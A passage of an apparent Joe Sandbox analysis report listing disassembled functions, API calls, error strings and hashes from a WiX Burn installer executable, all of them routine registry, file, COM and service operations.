                                                                                                                                                          • IGNOREDEPENDENCIES, xrefs: 004151A4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CompareString
                                                                                                                                                          • String ID: Failed to copy the property value.$IGNOREDEPENDENCIES$d:\a\wix\wix\src\burn\engine\package.cpp
                                                                                                                                                          • API String ID: 1825529933-292868319
                                                                                                                                                          • Opcode ID: 2fee0bdc1d37e9941b55264e02dc0caff0640f6658688d495319b78a015358f9
                                                                                                                                                          • Instruction ID: 672f4d494a7151d957684c2a27f9d2e5e8ef63a02a8a7854181eccb64e0780cf
                                                                                                                                                          • Opcode Fuzzy Hash: 2fee0bdc1d37e9941b55264e02dc0caff0640f6658688d495319b78a015358f9
                                                                                                                                                          • Instruction Fuzzy Hash: F1110832604605FBDB118B84CC45FDA77A0EF45720F6102B7FA18BB2D1D2B46C908B98
                                                                                                                                                          Function 00468614 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00467B72: RegOpenKeyExW.KERNELBASE(?,00467B6E,00000000,00000000,00000003,00000000,?,?,00470A51,80000002,00000000,00020019,00000000,00000000,SOFTWARE\Policies\,00000000), ref: 00467B9D
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000000,00020019,00000000,00000000,00000000,?,?,?,00416615,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\RebootPending,00000000,00000000,80000002), ref: 004686B7
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to open key: %ls, xrefs: 00468654
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp, xrefs: 00468663, 004686A0
                                                                                                                                                          • Failed to read value type: %ls/@%ls, xrefs: 00468691
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseOpen
                                                                                                                                                          • String ID: Failed to open key: %ls$Failed to read value type: %ls/@%ls$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                          • API String ID: 47109696-1840309882
                                                                                                                                                          • Opcode ID: 335cd17012c564b4f2d41341e5df77bd5302b4b98b5c43f8ec584eec2107a588
                                                                                                                                                          • Instruction ID: 73a13548c88e60d9eff8d91c1f934aa4a3f21da12038b285fff356d4d5e97c21
                                                                                                                                                          • Opcode Fuzzy Hash: 335cd17012c564b4f2d41341e5df77bd5302b4b98b5c43f8ec584eec2107a588
                                                                                                                                                          • Instruction Fuzzy Hash: 6711EB36940214BBDB219F44CC0AFDE7B24DB05725F50415AFD047A1D1F6794E20A79E
                                                                                                                                                          Function 0044D904 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 62COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 004050E3: FindFirstFileW.KERNELBASE(?,?,?,00000000), ref: 0040511E
                                                                                                                                                            • Part of subcall function 004050E3: FindClose.KERNEL32(00000000,?,00000000), ref: 0040512A
                                                                                                                                                          • SetFileAttributesW.KERNEL32(0044AFBC,?,0044AFBC,?,00477924,?,?,0044AFBC,?,?,?,00000000,00000000,00000000), ref: 0044D933
                                                                                                                                                          • GetLastError.KERNEL32(?,?,0044AFBC,?,?,?,00000000,00000000,00000000), ref: 0044D93D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FileFind$AttributesCloseErrorFirstLast
                                                                                                                                                          • String ID: Failed to clear readonly bit on payload destination path: %ls$d:\a\wix\wix\src\burn\engine\apply.cpp
                                                                                                                                                          • API String ID: 1980345056-1326892428
                                                                                                                                                          • Opcode ID: d840630c0beb34f1e957a57d286b4ececc42822660989ec9e416ed21976b7c01
                                                                                                                                                          • Instruction ID: ae4e8168a646cefaef1be2b3d81661b403a1866ecede465d093f54406772564b
                                                                                                                                                          • Opcode Fuzzy Hash: d840630c0beb34f1e957a57d286b4ececc42822660989ec9e416ed21976b7c01
                                                                                                                                                          • Instruction Fuzzy Hash: CF11C2B3E01235B7EB216A958C45BAF6A5C9B41B60F154137BC54FB391D22C8D4086E9
                                                                                                                                                          Function 00405174 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • ReadFile.KERNEL32(00000008,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0046ECC1,00000000,?,00000008,00000000,?), ref: 00405199
                                                                                                                                                          • GetLastError.KERNEL32(?,?,0046ECC1,00000000,?,00000008,00000000,?,?,?), ref: 004051A3
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorFileLastRead
                                                                                                                                                          • String ID: Failed to read data from file handle.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
                                                                                                                                                          • API String ID: 1948546556-1834244307
                                                                                                                                                          • Opcode ID: 07040f1398ecc51be11c4238575133a179fca894b805d09f3162f4b7ff3dcaba
                                                                                                                                                          • Instruction ID: 13a925188af6fa6cd62a82aec8ca4ac5b9c649133d569ca596bb88764387a2f9
                                                                                                                                                          • Opcode Fuzzy Hash: 07040f1398ecc51be11c4238575133a179fca894b805d09f3162f4b7ff3dcaba
                                                                                                                                                          • Instruction Fuzzy Hash: 0D01C433E40628BBD7209A988D85BAFB66CEB51B64F11413AFD04FB280D6789D005AE4
                                                                                                                                                          Function 0046B38A Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 59COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0046B065: SysAllocString.OLEAUT32(00000000), ref: 0046B079
                                                                                                                                                            • Part of subcall function 0046B065: VariantInit.OLEAUT32(?), ref: 0046B085
                                                                                                                                                            • Part of subcall function 0046B065: VariantClear.OLEAUT32(?), ref: 0046B174
                                                                                                                                                            • Part of subcall function 0046B065: SysFreeString.OLEAUT32(00000000), ref: 0046B17F
                                                                                                                                                          • SysFreeString.OLEAUT32(00000001), ref: 0046B416
                                                                                                                                                          Strings
                                                                                                                                                          • failed XmlGetAttribute, xrefs: 0046B3AC
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp, xrefs: 0046B3BB
                                                                                                                                                          • Failed to treat attribute value as UInt64., xrefs: 0046B3E5
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: String$FreeVariant$AllocClearInit
                                                                                                                                                          • String ID: Failed to treat attribute value as UInt64.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed XmlGetAttribute
                                                                                                                                                          • API String ID: 3379191133-877610536
                                                                                                                                                          • Opcode ID: f09920795a8ed63b332d5300d89813fee2c382e55fa2d745d28a46ef7472c18e
                                                                                                                                                          • Instruction ID: 987b00ecd3129dc65d0d1cbe0f60bd62f6ff08763a1b645ef89c919959ec8a50
                                                                                                                                                          • Opcode Fuzzy Hash: f09920795a8ed63b332d5300d89813fee2c382e55fa2d745d28a46ef7472c18e
                                                                                                                                                          • Instruction Fuzzy Hash: C2116D74E40318BFDB119F948C81A9EBB78EB15754F1080AAFD01AA382E7748E519AD5
                                                                                                                                                          Function 00467AAE Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 59registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00467B72: RegOpenKeyExW.KERNELBASE(?,00467B6E,00000000,00000000,00000003,00000000,?,?,00470A51,80000002,00000000,00020019,00000000,00000000,SOFTWARE\Policies\,00000000), ref: 00467B9D
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000000,00020019,00000000,00000000,00000000,?,?,004165D9,80000002,SOFTWARE\Microsoft\ServerManager,CurrentRebootAttempts,00000000,00000214,00000000), ref: 00467B4B
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to open key: %ls, xrefs: 00467AE9
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp, xrefs: 00467AF8, 00467B34
                                                                                                                                                          • Failed to read value: %ls/@%ls, xrefs: 00467B25
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseOpen
                                                                                                                                                          • String ID: Failed to open key: %ls$Failed to read value: %ls/@%ls$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                          • API String ID: 47109696-172966028
                                                                                                                                                          • Opcode ID: 1bf519c5ef46129239c21ecbc4e67d3050492fd75a926c3caee25c3961d5136c
                                                                                                                                                          • Instruction ID: b3cbae3e8fcee92ad893d42706dd3aab40dd8c02cf601aedc7a97c331f99f08e
                                                                                                                                                          • Opcode Fuzzy Hash: 1bf519c5ef46129239c21ecbc4e67d3050492fd75a926c3caee25c3961d5136c
                                                                                                                                                          • Instruction Fuzzy Hash: 31110A32984318B7DF225E44CC0BFDEBA249B04B2CF144056FB04751A4F27D4E20A79A
                                                                                                                                                          Function 00405685 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 56COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetFilePointerEx.KERNEL32(?,?,?,?,?,00000000,?,?,?,0041BDC6,00000000,00000000,00000000,00000000,00000000), ref: 004056A3
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,0041BDC6,00000000,00000000,00000000,00000000,00000000,?,00000001,?,WixBundleOriginalSource,?,?,?), ref: 004056AD
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorFileLastPointer
                                                                                                                                                          • String ID: Failed to set file pointer.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
                                                                                                                                                          • API String ID: 2976181284-1564447625
                                                                                                                                                          • Opcode ID: 89d3025ab08b659d9b4514372133f01f6506868492df7b366f591d310ff8d5cb
                                                                                                                                                          • Instruction ID: a0cc8b17b41d949ed6d2edb0cc867bc1871b624ddcb66bce9050f101d2f5d618
                                                                                                                                                          • Opcode Fuzzy Hash: 89d3025ab08b659d9b4514372133f01f6506868492df7b366f591d310ff8d5cb
                                                                                                                                                          • Instruction Fuzzy Hash: 220108B1A00228FBDB208F45DC49DAB7F7CDB04764F01406AFD08B7391E6349D00DAA4
                                                                                                                                                          Function 00444625 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 55serviceCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • ControlService.ADVAPI32(00444505,00000001,?,00000000,00000000,?,?,?,?,?,?,00444505,00000000), ref: 0044464D
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00444505,00000000), ref: 00444657
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ControlErrorLastService
                                                                                                                                                          • String ID: Failed to stop wusa service.$d:\a\wix\wix\src\burn\engine\msuengine.cpp
                                                                                                                                                          • API String ID: 4114567744-12490674
                                                                                                                                                          • Opcode ID: 7822e3a64c89ffd0985ff62a8bfc5f634ba54232a86a63d181b042b3b2cfc6e3
                                                                                                                                                          • Instruction ID: 65caf6ea81e1ede53078b2ace96eb05e417811a483d1e52e857cc586892de881
                                                                                                                                                          • Opcode Fuzzy Hash: 7822e3a64c89ffd0985ff62a8bfc5f634ba54232a86a63d181b042b3b2cfc6e3
                                                                                                                                                          • Instruction Fuzzy Hash: 4401DD72B4022877E7109B559C45FAF76AC9B89B54F52013AFD04FB291E67C9C4045E8
                                                                                                                                                          Function 00405C1E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 55fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • WriteFile.KERNEL32(0046EC8C,?,?,00000000,00000000,0046EC90,00000000,00000000,?,?,0046F0F2,0046EC8C,00000000,0046EC8C,?,?), ref: 00405C43
                                                                                                                                                          • GetLastError.KERNEL32(?,?,0046F0F2,0046EC8C,00000000,0046EC8C,?,?,?,00000000,0046EC8C,0046EC8C,00000000), ref: 00405C4D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorFileLastWrite
                                                                                                                                                          • String ID: Failed to write data to file handle.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
                                                                                                                                                          • API String ID: 442123175-3789007561
                                                                                                                                                          • Opcode ID: 495c1b5883239babe03de4a2cb9e2a1d9d58ce258f2e836813d683b17b21dd76
                                                                                                                                                          • Instruction ID: d384bb13fb7dfcaf851ed18460492c1fa975961cd4a46915afd91a67d0308e9c
                                                                                                                                                          • Opcode Fuzzy Hash: 495c1b5883239babe03de4a2cb9e2a1d9d58ce258f2e836813d683b17b21dd76
                                                                                                                                                          • Instruction Fuzzy Hash: 1501B973A447287BE7209E988D89FAF776CDB41B64F51403AB904F7280D6789E0096E4
                                                                                                                                                          Function 00405811 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetFileSizeEx.KERNEL32(00000000,00000000,?,00000000,?,?,?,0040F92E,0100147D,?,?,00000000,00000000), ref: 00405829
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,0040F92E,0100147D,?,?,00000000,00000000,?,?,?,004087CC,00000000,004080B0), ref: 00405833
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorFileLastSize
                                                                                                                                                          • String ID: Failed to get size of file.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
                                                                                                                                                          • API String ID: 464720113-1502062690
                                                                                                                                                          • Opcode ID: c8e2d55dd3ce9d27782c65d7b700a5569759796316a18633ca3c6e13a9224a38
                                                                                                                                                          • Instruction ID: d28492828f7f859c0aa2f07d4b5979f250ccdc7006c0e85cecd66e345b4a7e4f
                                                                                                                                                          • Opcode Fuzzy Hash: c8e2d55dd3ce9d27782c65d7b700a5569759796316a18633ca3c6e13a9224a38
                                                                                                                                                          • Instruction Fuzzy Hash: 4E01D8B39416297BD7105B558C05AABBBACEF04764F11802BFD04BB380E7789D10CBE4
                                                                                                                                                          Function 00420C50 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CoInitializeEx.OLE32(00000000,00000000), ref: 00420C60
                                                                                                                                                          • CoUninitialize.OLE32(?,00000000,?,?,?,?,?,?), ref: 00420CCB
                                                                                                                                                          Strings
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\core.cpp, xrefs: 00420C87
                                                                                                                                                          • Failed to initialize COM on cache thread., xrefs: 00420C75
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeUninitialize
                                                                                                                                                          • String ID: Failed to initialize COM on cache thread.$d:\a\wix\wix\src\burn\engine\core.cpp
                                                                                                                                                          • API String ID: 3442037557-1349626878
                                                                                                                                                          • Opcode ID: 6bb0f204a4ff0df5e3a9ea3f284ff9ad9035fac9d0d34fe97f72c3172906397c
                                                                                                                                                          • Instruction ID: d897d95878bcc8b818dec8c0573d4f591cd2531601801c6189ea98bc5a72ec24
                                                                                                                                                          • Opcode Fuzzy Hash: 6bb0f204a4ff0df5e3a9ea3f284ff9ad9035fac9d0d34fe97f72c3172906397c
                                                                                                                                                          • Instruction Fuzzy Hash: 2D012872600210BBDB119F86CC85FEB7BA8EF49764F44017BFD08DA252E674A800D7A4
                                                                                                                                                          Function 0046B424 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 50memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 0046B439
                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0046B48B
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: String$AllocFree
                                                                                                                                                          • String ID: d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed SysAllocString
                                                                                                                                                          • API String ID: 344208780-664205486
                                                                                                                                                          • Opcode ID: 876e083dd11bf42970f3cc40f6ab639e9403fa5280d61b66fb9a4784d4fb78dc
                                                                                                                                                          • Instruction ID: e9ac59b856ecd27d9e0170437860021c7dea19aa094fcf626687b69e084263c0
                                                                                                                                                          • Opcode Fuzzy Hash: 876e083dd11bf42970f3cc40f6ab639e9403fa5280d61b66fb9a4784d4fb78dc
                                                                                                                                                          • Instruction Fuzzy Hash: 4401D631640224B7C7216E099C88E6B3B6CEB85BB0F55406BFC08F7351EB788C81D6E9
                                                                                                                                                          Function 00468739 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 48registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
